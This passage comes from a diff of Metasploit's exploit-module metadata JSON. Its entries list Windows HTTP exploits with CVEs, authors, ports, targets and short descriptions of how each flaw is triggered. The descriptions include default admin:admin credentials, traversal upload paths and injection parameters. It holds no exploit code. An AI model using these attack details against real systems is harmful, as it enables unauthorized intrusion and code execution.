17:38:06 +0000", - "path": "/modules/exploits/windows/games/ut2004_secure.rb", - "is_install_path": true, - "ref_name": "windows/games/ut2004_secure", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/adobe_robohelper_authbypass": { - "name": "Adobe RoboHelp Server 8 Arbitrary File Upload and Execute", - "fullname": "exploit/windows/http/adobe_robohelper_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2009-09-23", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits an authentication bypass vulnerability which\n allows remote attackers to upload and execute arbitrary code.", - "references": [ - "CVE-2009-3068", - "OSVDB-57896", - "URL-http://www.intevydis.com/blog/?p=69", - "ZDI-09-066" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Universal Windows Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/adobe_robohelper_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/http/adobe_robohelper_authbypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/advantech_iview_networkservlet_cmd_inject": { - "name": "Advantech iView NetworkServlet Command Injection", - "fullname": "exploit/windows/http/advantech_iview_networkservlet_cmd_inject", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-28", - "type": "exploit", - "author": [ - "rgod", - "y4er", - "Shelby Pace" - ], - "description": "Versions of Advantech iView software below `5.7.04.6469` are\n vulnerable to an unauthenticated command injection vulnerability\n via the `NetworkServlet` endpoint.\n The database backup functionality passes a user-controlled parameter,\n `backup_file` to the `mysqldump` command. The sanitization functionality only\n tests for SQL injection attempts and directory traversal, so leveraging the\n `-r` and `-w` `mysqldump` flags permits exploitation.\n The command injection vulnerability is used to write a payload on the target\n and achieve remote code execution as NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/", - "CVE-2022-2143" - ], - "platform": "Windows", - "arch": "x86, x64, cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Dropper", - "Windows Command" - ], - "mod_time": "2022-08-09 16:12:54 +0000", - "path": "/modules/exploits/windows/http/advantech_iview_networkservlet_cmd_inject.rb", - "is_install_path": true, - "ref_name": "windows/http/advantech_iview_networkservlet_cmd_inject", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/advantech_iview_unauth_rce": { - "name": "Advantech iView Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/http/advantech_iview_unauth_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-02-09", - "type": "exploit", - "author": [ - "wvu ", - "Spencer McIntyre" - ], - "description": "This module exploits an unauthenticated configuration change combined\n with an unauthenticated file write primitive, leading to an arbitrary\n file write that allows for remote code execution as the user running\n iView, which is typically NT AUTHORITY\\SYSTEM.\n\n This issue was demonstrated in the vulnerable version 5.7.02.5992 and\n fixed in version 5.7.03.6112.", - "references": [ - "CVE-2021-22652", - "URL-https://www.rapid7.com/blog/post/2021/02/11/cve-2021-22652-advantech-iview-missing-authentication-rce-fixed/", - "URL-https://us-cert.cisa.gov/ics/advisories/icsa-21-040-02" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper", - "PowerShell Stager" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/http/advantech_iview_unauth_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/advantech_iview_unauth_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/ajaxpro_deserialization_rce": { - "name": "AjaxPro Deserialization Remote Code Execution", - "fullname": "exploit/windows/http/ajaxpro_deserialization_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-12-03", - "type": "exploit", - "author": [ - "Hans-Martin Münch (MOGWAI LABS)", - "Jemmy Wang" - ], - "description": "This module leverages an insecure deserialization of data to get\n remote code execution on the target OS in the context of the user\n running the website which utilized AjaxPro.\n\n To achieve code execution, the module will construct some JSON data\n which will be sent to the target. This data will be deserialized by\n the AjaxPro JsonDeserializer and will trigger the execution of the\n payload.\n\n All AjaxPro versions prior to 21.10.30.1 are vulnerable to this\n issue, and a vulnerable method which can be used to trigger the\n deserialization exists in the default AjaxPro namespace.\n\n AjaxPro 21.10.30.1 removed the vulnerable method, but if a custom\n method that accepts a parameter of type that is assignable from\n `ObjectDataProvider` (e.g. `object`) exists, the vulnerability can\n still be exploited.\n\n This module has been tested successfully against official AjaxPro on\n version 7.7.31.1 without any modification, and on version 21.10.30.1\n with a custom vulnerable method added.", - "references": [ - "CVE-2021-23758", - "URL-https://mogwailabs.de/en/blog/2022/01/vulnerability-spotlight-rce-in-ajax.net-professional/" - ], - "platform": "Windows", - "arch": "cmd, x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command", - "Windows Dropper" - ], - "mod_time": "2023-11-03 00:04:20 +0000", - "path": "/modules/exploits/windows/http/ajaxpro_deserialization_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/ajaxpro_deserialization_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "screen-effects", - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/altn_securitygateway": { - "name": "Alt-N SecurityGateway username Buffer Overflow", - "fullname": "exploit/windows/http/altn_securitygateway", - "aliases": [], - "rank": 200, - "disclosure_date": "2008-06-02", - "type": "exploit", - "author": [ - "jduck " - ], - "description": "Alt-N SecurityGateway is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the \"username\"\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.\n\n NOTE: This service doesn't restart, you'll only get one shot. However,\n it often survives a successful exploitation attempt.", - "references": [ - "CVE-2008-4193", - "OSVDB-45854", - "BID-29457" - ], - "platform": "Windows", - "arch": "", - "rport": 4000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Targeting", - "SecurityGateway 1.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/altn_securitygateway.rb", - "is_install_path": true, - "ref_name": "windows/http/altn_securitygateway", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/altn_webadmin": { - "name": "Alt-N WebAdmin USER Buffer Overflow", - "fullname": "exploit/windows/http/altn_webadmin", - "aliases": [], - "rank": 200, - "disclosure_date": "2003-06-24", - "type": "exploit", - "author": [ - "MC " - ], - "description": "Alt-N WebAdmin is prone to a buffer overflow condition. This\n is due to insufficient bounds checking on the USER\n parameter. Successful exploitation could result in code\n execution with SYSTEM level privileges.", - "references": [ - "CVE-2003-0471", - "OSVDB-2207", - "BID-8024", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=11771" - ], - "platform": "Windows", - "arch": "", - "rport": 1000, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "WebAdmin 2.0.4 Universal", - "WebAdmin 2.0.3 Universal", - "WebAdmin 2.0.2 Universal", - "WebAdmin 2.0.1 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/altn_webadmin.rb", - "is_install_path": true, - "ref_name": "windows/http/altn_webadmin", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/amlibweb_webquerydll_app": { - "name": "Amlibweb NetOpacs webquery.dll Stack Buffer Overflow", - "fullname": "exploit/windows/http/amlibweb_webquerydll_app", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-08-03", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in Amlib's Amlibweb\n Library Management System (NetOpacs). The webquery.dll\n API is available through IIS requests. By specifying\n an overly long string to the 'app' parameter, SeH can be\n reliably overwritten allowing for arbitrary remote code execution.\n In addition, it is possible to overwrite EIP by specifying\n an arbitrary parameter name with an '=' terminator.", - "references": [ - "OSVDB-66814", - "BID-42293", - "URL-http://www.aushack.com/advisories/" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro All - English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/amlibweb_webquerydll_app.rb", - "is_install_path": true, - "ref_name": "windows/http/amlibweb_webquerydll_app", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_activemq_traversal_upload": { - "name": "Apache ActiveMQ 5.x-5.11.1 Directory Traversal Shell Upload", - "fullname": "exploit/windows/http/apache_activemq_traversal_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-08-19", - "type": "exploit", - "author": [ - "David Jorm", - "Erik Wynter" - ], - "description": "This module exploits a directory traversal vulnerability (CVE-2015-1830) in Apache\n ActiveMQ 5.x before 5.11.2 for Windows.\n\n The module tries to upload a JSP payload to the /admin directory via the traversal\n path /fileserver/..\\admin\\ using an HTTP PUT request with the default ActiveMQ\n credentials admin:admin (or other credentials provided by the user). It then issues\n an HTTP GET request to /admin/.jsp on the target in order to trigger the\n payload and obtain a shell.", - "references": [ - "CVE-2015-1830", - "EDB-40857", - "URL-https://activemq.apache.org/security-advisories.data/CVE-2015-1830-announcement.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 8161, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Java" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/apache_activemq_traversal_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_activemq_traversal_upload", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_chunked": { - "name": "Apache Win32 Chunked Encoding", - "fullname": "exploit/windows/http/apache_chunked", - "aliases": [], - "rank": 400, - "disclosure_date": "2002-06-19", - "type": "exploit", - "author": [ - "hdm ", - "jduck " - ], - "description": "This module exploits the chunked transfer integer wrap\n vulnerability in Apache version 1.2.x to 1.3.24. This\n particular module has been tested with all versions of the\n official Win32 build between 1.3.9 and 1.3.24. Additionally,\n it should work against most co-branded and bundled versions\n of Apache (Oracle 8i, 9i, IBM HTTPD, etc).\n\n You will need to use the Check() functionality to determine\n the exact target version prior to launching the exploit. The\n version of Apache bundled with Oracle 8.1.7 will not\n automatically restart, so if you use the wrong target value,\n the server will crash.", - "references": [ - "CVE-2002-0392", - "OSVDB-838", - "BID-5033" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Generic Bruteforce", - "Apache.org Build 1.3.9->1.3.19", - "Apache.org Build 1.3.22->1.3.24", - "Apache.org Build 1.3.19->1.3.24", - "Apache.org Build 1.3.22", - "Apache.org Build 1.3.17->1.3.24 (Windows 2000)", - "Apache.org Build 1.3.17->1.3.24 (Windows NT)", - "Windows 2003 English SP0", - "Windows 2000 English", - "Oracle 8.1.7 Apache 1.3.12", - "Oracle 9.1.0 Apache 1.3.12", - "Oracle 9.2.0 Apache 1.3.22", - "Debugging Target" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_chunked.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_chunked", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_mod_rewrite_ldap": { - "name": "Apache Module mod_rewrite LDAP Protocol Buffer Overflow", - "fullname": "exploit/windows/http/apache_mod_rewrite_ldap", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-28", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits the mod_rewrite LDAP protocol scheme handling\n flaw discovered by Mark Dowd, which produces an off-by-one overflow.\n Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable.\n This module requires REWRITEPATH to be set accurately. In addition,\n the target must have 'RewriteEngine on' configured, with a specific\n 'RewriteRule' condition enabled to allow for exploitation.\n\n The flaw affects multiple platforms, however this module currently\n only supports Windows based installations.", - "references": [ - "CVE-2006-3747", - "OSVDB-27588", - "BID-19204", - "URL-http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html", - "EDB-3680", - "EDB-3996", - "EDB-2237" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_mod_rewrite_ldap.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_mod_rewrite_ldap", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_modjk_overflow": { - "name": "Apache mod_jk 1.2.20 Buffer Overflow", - "fullname": "exploit/windows/http/apache_modjk_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-03-02", - "type": "exploit", - "author": [ - "Nicob " - ], - "description": "This is a stack buffer overflow exploit for mod_jk 1.2.20.\n Should work on any Win32 OS.", - "references": [ - "CVE-2007-0774", - "OSVDB-33855", - "BID-22791", - "ZDI-07-008" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/apache_modjk_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_modjk_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/apache_tika_jp2_jscript": { - "name": "Apache Tika Header Command Injection", - "fullname": "exploit/windows/http/apache_tika_jp2_jscript", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-04-25", - "type": "exploit", - "author": [ - "h00die", - "David Yesland", - "Tim Allison" - ], - "description": "This module exploits a command injection vulnerability in Apache\n Tika 1.15 - 1.17 on Windows. A file with the image/jp2 content-type is\n used to bypass magic bytes checking. When OCR is specified in the\n request, parameters can be passed to change the parameters passed\n at command line to allow for arbitrary JScript to execute. A\n JScript stub is passed to execute arbitrary code. This module was\n verified against version 1.15 - 1.17 on Windows 2012.\n While the CVE and finding show more versions vulnerable, during\n testing it was determined only > 1.14 was exploitable due to\n jp2 support being added.", - "references": [ - "EDB-46540", - "URL-https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/", - "URL-https://lists.apache.org/thread.html/b3ed4432380af767effd4c6f27665cc7b2686acccbefeb9f55851dca@%3Cdev.tika.apache.org%3E", - "CVE-2018-1335" - ], - "platform": "Windows", - "arch": "", - "rport": 9998, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/apache_tika_jp2_jscript.rb", - "is_install_path": true, - "ref_name": "windows/http/apache_tika_jp2_jscript", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/avaya_ccr_imageupload_exec": { - "name": "Avaya IP Office Customer Call Reporter ImageUpload.ashx Remote Command Execution", - "fullname": "exploit/windows/http/avaya_ccr_imageupload_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-06-28", - "type": "exploit", - "author": [ - "rgod ", - "juan vazquez " - ], - "description": "This module exploits an authentication bypass vulnerability on Avaya IP Office\n Customer Call Reporter, which allows a remote user to upload arbitrary files\n through the ImageUpload.ashx component. It can be abused to upload and execute\n arbitrary ASP .NET code. The vulnerability has been tested successfully on Avaya IP\n Office Customer Call Reporter 7.0.4.2 and 8.0.8.15 on Windows 2003 SP2.", - "references": [ - "CVE-2012-3811", - "OSVDB-83399", - "BID-54225", - "URL-https://downloads.avaya.com/css/P8/documents/100164021", - "ZDI-12-106" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Avaya IP Office Customer Call Reporter 7.0 and 8.0 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2019-08-02 09:48:53 +0000", - "path": "/modules/exploits/windows/http/avaya_ccr_imageupload_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/avaya_ccr_imageupload_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/badblue_ext_overflow": { - "name": "BadBlue 2.5 EXT.dll Buffer Overflow", - "fullname": "exploit/windows/http/badblue_ext_overflow", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-04-20", - "type": "exploit", - "author": [ - "acaro " - ], - "description": "This is a stack buffer overflow exploit for BadBlue version 2.5.", - "references": [ - "CVE-2005-0595", - "OSVDB-14238", - "BID-7387" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "BadBlue 2.5 (Universal)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/badblue_ext_overflow.rb", - "is_install_path": true, - "ref_name": "windows/http/badblue_ext_overflow", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/badblue_passthru": { - "name": "BadBlue 2.72b PassThru Buffer Overflow", - "fullname": "exploit/windows/http/badblue_passthru", - "aliases": [], - "rank": 500, - "disclosure_date": "2007-12-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the PassThru\n functionality in ext.dll in BadBlue 2.72b and earlier.", - "references": [ - "CVE-2007-6377", - "OSVDB-42416", - "BID-26803" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "BadBlue EE 2.7 Universal", - "BadBlue 2.72b Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/badblue_passthru.rb", - "is_install_path": true, - "ref_name": "windows/http/badblue_passthru", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_jsessionid": { - "name": "BEA WebLogic JSESSIONID Cookie Value Overflow", - "fullname": "exploit/windows/http/bea_weblogic_jsessionid", - "aliases": [], - "rank": 400, - "disclosure_date": "2009-01-13", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable\n code is only accessible when clustering is configured. A request containing a\n long JSESSION cookie value can lead to arbitrary code execution.", - "references": [ - "CVE-2008-5457", - "OSVDB-51311" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Apache 2.2 - WebLogic module version 1.0.1136334", - "Windows Apache 2.2 - WebLogic module version 1.0.1150354" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_jsessionid.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_jsessionid", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_post_bof": { - "name": "Oracle Weblogic Apache Connector POST Request Buffer Overflow", - "fullname": "exploit/windows/http/bea_weblogic_post_bof", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-07-17", - "type": "exploit", - "author": [ - "KingCope", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin.\n\n The connector fails to properly handle specially crafted HTTP POST\n requests, resulting a buffer overflow due to the insecure usage\n of sprintf. Currently, this module works over Windows systems without DEP,\n and has been tested with Windows 2000 / XP.\n\n In addition, the Weblogic Apache plugin version is fingerprinted with a POST\n request containing a specially crafted Transfer-Encoding header.", - "references": [ - "CVE-2008-3257", - "OSVDB-47096", - "BID-30273" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", - "BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]", - "BEA WebLogic 8.1 SP4 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_post_bof.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_post_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/bea_weblogic_transfer_encoding": { - "name": "BEA Weblogic Transfer-Encoding Buffer Overflow", - "fullname": "exploit/windows/http/bea_weblogic_transfer_encoding", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-09-09", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack based buffer overflow in the BEA\n Weblogic Apache plugin. This vulnerability exists in the\n error reporting for unknown Transfer-Encoding headers.\n You may have to run this twice due to timing issues with handlers.", - "references": [ - "CVE-2008-4008", - "OSVDB-49283" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Apache 2.2 version Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/bea_weblogic_transfer_encoding.rb", - "is_install_path": true, - "ref_name": "windows/http/bea_weblogic_transfer_encoding", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/belkin_bulldog": { - "name": "Belkin Bulldog Plus Web Service Buffer Overflow", - "fullname": "exploit/windows/http/belkin_bulldog", - "aliases": [], - "rank": 200, - "disclosure_date": "2009-03-08", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Belkin Bulldog Plus\n 4.0.2 build 1219. When sending a specially crafted http request,\n an attacker may be able to execute arbitrary code.", - "references": [ - "OSVDB-54395", - "BID-34033", - "EDB-8173" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP SP3 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/belkin_bulldog.rb", - "is_install_path": true, - "ref_name": "windows/http/belkin_bulldog", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_arcserve_rpc_authbypass": { - "name": "CA Arcserve D2D GWT RPC Credential Information Disclosure", - "fullname": "exploit/windows/http/ca_arcserve_rpc_authbypass", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-07-25", - "type": "exploit", - "author": [ - "bannedit ", - "rgod" - ], - "description": "This module exploits an information disclosure vulnerability in the CA Arcserve\n D2D r15 web server. The information disclosure can be triggered by sending a\n specially crafted RPC request to the homepage servlet. This causes CA Arcserve to\n disclosure the username and password in cleartext used for authentication. This\n username and password pair are Windows credentials with Administrator access.", - "references": [ - "CVE-2011-3011", - "OSVDB-74162", - "EDB-17574" - ], - "platform": "Windows", - "arch": "", - "rport": 8014, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_arcserve_rpc_authbypass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_igateway_debug": { - "name": "CA iTechnology iGateway Debug Mode Buffer Overflow", - "fullname": "exploit/windows/http/ca_igateway_debug", - "aliases": [], - "rank": 200, - "disclosure_date": "2005-10-06", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a vulnerability in the Computer Associates\n iTechnology iGateway component. When True is enabled\n in igateway.conf (non-default), it is possible to overwrite the stack\n and execute code remotely. This module works best with Ordinal payloads.", - "references": [ - "CVE-2005-3190", - "OSVDB-19920", - "URL-http://www.ca.com/us/securityadvisor/vulninfo/vuln.aspx?id=33485", - "EDB-1243", - "BID-15025" - ], - "platform": "Windows", - "arch": "", - "rport": 5250, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "iGateway 3.0.40621.0" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/ca_igateway_debug.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_igateway_debug", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/ca_totaldefense_regeneratereports": { - "name": "CA Total Defense Suite reGenerateReports Stored Procedure SQL Injection", - "fullname": "exploit/windows/http/ca_totaldefense_regeneratereports", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-04-13", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a SQL injection flaw in CA Total Defense Suite R12.\n When supplying a specially crafted soap request to '/UNCWS/Management.asmx', an\n attacker can abuse the reGenerateReports stored procedure by injecting arbitrary sql\n statements into the ReportIDs element.", - "references": [ - "ZDI-11-134", - "OSVDB-74968", - "CVE-2011-1653" - ], - "platform": "Windows", - "arch": "", - "rport": 34443, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Universal" - ], - "mod_time": "2022-06-29 19:10:52 +0000", - "path": "/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb", - "is_install_path": true, - "ref_name": "windows/http/ca_totaldefense_regeneratereports", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/cayin_xpost_sql_rce": { - "name": "Cayin xPost wayfinder_seqid SQLi to RCE", - "fullname": "exploit/windows/http/cayin_xpost_sql_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-04", - "type": "exploit", - "author": [ - "h00die", - "Gjoko Krstic (LiquidWorm) " - ], - "description": "This module exploits an unauthenticated SQLi in Cayin xPost <=2.5. The\n wayfinder_meeting_input.jsp file's wayfinder_seqid parameter can be injected\n with a blind SQLi. Since this app bundles MySQL and apache Tomcat the\n environment is pretty static and therefore the default settings should\n work. Results in SYSTEM level access.\n Only the java/jsp_shell_reverse_tcp and 